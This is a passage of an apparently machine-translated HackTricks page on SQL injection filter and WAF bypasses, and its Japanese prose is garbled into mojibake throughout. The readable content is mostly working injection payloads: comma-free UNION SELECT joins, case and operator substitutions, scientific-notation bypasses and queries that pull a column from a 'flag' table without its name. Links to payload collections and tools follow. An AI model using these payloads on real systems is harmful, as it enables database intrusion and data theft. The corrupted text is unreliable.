?id=(1)and(1)=(1)--
No commas bypass
No Comma - OFFSETãFROMãJOINã䜿çšãããã€ãã¹
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
äžè¬çãªãã€ãã¹
ããŒã¯ãŒãã䜿çšãããã©ãã¯ãªã¹ã - 倧æå/å°æåã䜿çšããŠãã€ãã¹
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
ããŒã¯ãŒããç¡èŠããŠãã©ãã¯ãªã¹ã - åçã®æŒç®åã䜿çšããŠãã€ãã¹
AND -> && -> %26%26
OR -> || -> %7C%7C
= -> LIKE,REGEXP,RLIKE, not < and not >
> X -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
Scientific Notation WAF bypass
ãã®ããªãã¯ã®è©³çŽ°ãªèª¬æã¯gosecure blogã§èŠã€ããããšãã§ããŸãã
åºæ¬çã«ãWAFããã€ãã¹ããããã«ç§åŠçè¡šèšãäºæããªãæ¹æ³ã§äœ¿çšã§ããŸãïŒ
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
ã«ã©ã åå¶éã®ãã€ãã¹
ãŸã第äžã«ãå
ã®ã¯ãšãªãšãã©ã°ãæœåºãããããŒãã«ãåãæ°ã®ã«ã©ã ãæã£ãŠããå Žåãåã«æ¬¡ã®ããã«ããããšãã§ããŸã: 0 UNION SELECT * FROM flag
ããŒãã«ã®ååã䜿çšããã«ç¬¬äžã«ã©ã ã«ã¢ã¯ã»ã¹ããããšãå¯èœã§ã次ã®ãããªã¯ãšãªã䜿çšããŸã: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
ãããã£ãŠãsqlinjectionã§ã¯æ¬¡ã®ããã«ãªããŸã:
# This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
ãŸã㯠ã«ã³ããã€ãã¹ ã䜿çšããŸã:
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
ãã®ããªãã¯ã¯https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/ããåãããŸããã
WAFãã€ãã¹ãµãžã§ã¹ã¿ãŒããŒã«
{% embed url="https://github.com/m4ll0k/Atlas" %}
ãã®ä»ã®ã¬ã€ã
- https://sqlwiki.netspi.com/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
ãã«ãŒããã©ãŒã¹æ€åºãªã¹ã
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
â
âââââââRootedCONã¯ãã¹ãã€ã³ã§æãé¢é£æ§ã®é«ããµã€ããŒã»ãã¥ãªãã£ã€ãã³ãã§ããããšãŒãããã§æãéèŠãªã€ãã³ãã®äžã€ã§ããæè¡ç¥èã®ä¿é²ã䜿åœãšãããã®äŒè°ã¯ããããåéã®æè¡ãšãµã€ããŒã»ãã¥ãªãã£ã®å°é家ã®ç±ã亀æµã®å Žã§ãã
{% embed url="https://www.rootedcon.com/" %}
{% hint style="success" %}
AWSãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- ãããã³ã°ããªãã¯ãå ±æããã«ã¯ãHackTricksãšHackTricks Cloudã®GitHubãªããžããªã«PRãéä¿¡ããŠãã ããã